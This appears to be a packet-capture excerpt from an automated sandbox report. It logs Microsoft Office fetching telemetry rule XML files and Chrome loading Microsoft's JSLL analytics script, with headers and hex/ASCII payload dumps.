                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:01 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                59192.168.2.55544813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:01 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:01 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 485
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                ETag: "0x8DC582BB9769355"
                                                                                x-ms-request-id: dc68dac5-201e-006e-298c-15bbe3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093401Z-15767c5fc55852fxfeh7csa2dn0000000c600000000093he
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:01 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                60192.168.2.55545013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:01 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:01 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 427
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                ETag: "0x8DC582BB556A907"
                                                                                x-ms-request-id: be018b82-401e-0035-0c8c-1582d8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093401Z-15767c5fc55kg97hfq5uqyxxaw0000000cc00000000042x2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:01 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                61192.168.2.55545113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:01 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:01 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 470
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                ETag: "0x8DC582BBB181F65"
                                                                                x-ms-request-id: 4da5c699-a01e-0070-198c-15573b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093401Z-15767c5fc55w69c2zvnrz0gmgw0000000cmg000000003q4t
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:01 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                62192.168.2.55545313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:01 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 502
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                ETag: "0x8DC582BB6A0D312"
                                                                                x-ms-request-id: 801e2bd2-b01e-0021-6a8c-15cab7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55qdcd62bsn50hd6s0000000c7g000000000k71
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                63192.168.2.55545613.107.246.444436020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                Host: js.monitor.azure.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://learn.microsoft.com/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-10-04 09:34:03 UTC958INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                Content-Length: 207771
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                Last-Modified: Mon, 16 Sep 2024 18:20:53 GMT
                                                                                ETag: 0x8DCD67C4CF3530C
                                                                                x-ms-request-id: a84a52c5-d01e-00d3-671a-0ff173000000
                                                                                x-ms-version: 2009-09-19
                                                                                x-ms-meta-jssdkver: 4.3.2
                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.2.min.js
                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                Access-Control-Allow-Origin: *
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55kg97hfq5uqyxxaw0000000ccg000000003emf
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache-Info: L1_T2
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC15426INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 32 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                Data Ascii: /*! * 1DS JSLL SKU, 4.3.2 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 5b 22 6f 6e 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 78 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 6d
                                                                                Data Ascii: ["on"+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}xe(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),m
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 72 6e 28 6c 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 70 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 64 63 3d 70 63 3b 66 75 6e 63 74 69 6f 6e 20 70 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 66 6f 28 65 2c 73 63 29 5b 47 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 70 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 59 28 65 2c 22 6c 69 73 74 65 6e 65 72 73 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29
                                                                                Data Ascii: [te]({fn:r,arg:e}),n.h=n.h||rn(lc,0,n)):M(r,[e]))})}pc.__ieDyn=1;var dc=pc;function pc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=fo(e,sc)[Gn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(pc,this,function(e){Y(e,"listeners",{g:function(){return i}})
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 6f 2c 61 29 2c 66 5b 76 72 5d 28 29 2c 6f 5b 66 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 63 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 72 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 5a 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 5a 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 41 5b 74 65 5d 28 65 29 2c 6f 2e 61 64 64 65 64 3d 5b 65 5d 2c 67 28 6f 29 2c 72 26 26 72 28 21
                                                                                Data Ascii: o,a),f[vr](),o[fr](a)},6,n),i},f[cr]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ru);var i=s(e[Zn]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[Zn]+"] is already loaded!");var a,o={reason:16};function c(){A[te](e),o.added=[e],g(o),r&&r(!
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 20 45 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 63 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 77 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 62 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 49 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 6b 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 5f 6c 28 29 7b 72 65 74 75 72 6e 20 53 6c 28 29 3f 45 6c 28 62 6c 2e 53 65 73 73 69 6f 6e 53 74 6f
                                                                                Data Ascii: function El(e){try{if(oe(ct()))return null;var t=(new Date)[ws](),n=fe(e===bl.LocalStorage?"localStorage":"sessionStorage"),r=Il+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[ks](r),!i)return n}catch(a){}return null}function _l(){return Sl()?El(bl.SessionSto
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 5f 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 66 64 5d 3d 4f 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 53 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 76 61 72 20 6f 3d 74 68 69 73 2c 63 3d 7b 7d 3b 6f 2e 73 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 6e
                                                                                Data Ascii: not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var _d=function(e,t){this[fd]=Ot(),this.pageName=e,this.pageUrl=t},Sd=function(a,e){var o=this,c={};o.start=function(e){"un
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 6a 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 72 63 28 29 7d 2c 74 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54 61 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 6e 2e 5f 70 61 67 65 54 61 67 73 3d 7b 7d 2c
                                                                                Data Ascii: Type=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=jd(r._config),t.cookieEnabled=rc()},tp.prototype._setPageTags=function(e,t){var n=this;n._pageTags={},
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 78 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d 65 7c 7c 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72
                                                                                Data Ascii: aBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},xp.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].name||~t[n].name.indexOf("data-bi-"))return!0;r
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 22 2c 70 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 67 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 76 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 68 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 6d 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 79 67 3d 22 63 6f 6e 63 61 74 22 2c 43 67 3d 22 69 4b 65 79 22 2c 62 67 3d 22 63 6f 75 6e 74 22 2c 54 67 3d 22 65 76 65 6e 74 73 22 2c 49 67 3d 22 70 75 73 68 22 2c 45 67 3d 22 73 70 6c 69 74 22 2c 5f 67 3d 22 73 70 6c 69 63 65 22 2c 53 67 3d 22 74 6f 4c 6f 77 65 72 43 61 73 65 22 2c 78 67 3d 22 68 64 72 73 22 2c 4e 67 3d 22 75 73 65 48 64 72 73
                                                                                Data Ascii: ",pg="allowRequestSending",gg="firstRequestSent",vg="shouldAddClockSkewHeaders",hg="getClockSkewHeaderValue",mg="setClockSkew",ye="length",yg="concat",Cg="iKey",bg="count",Tg="events",Ig="push",Eg="split",_g="splice",Sg="toLowerCase",xg="hdrs",Ng="useHdrs
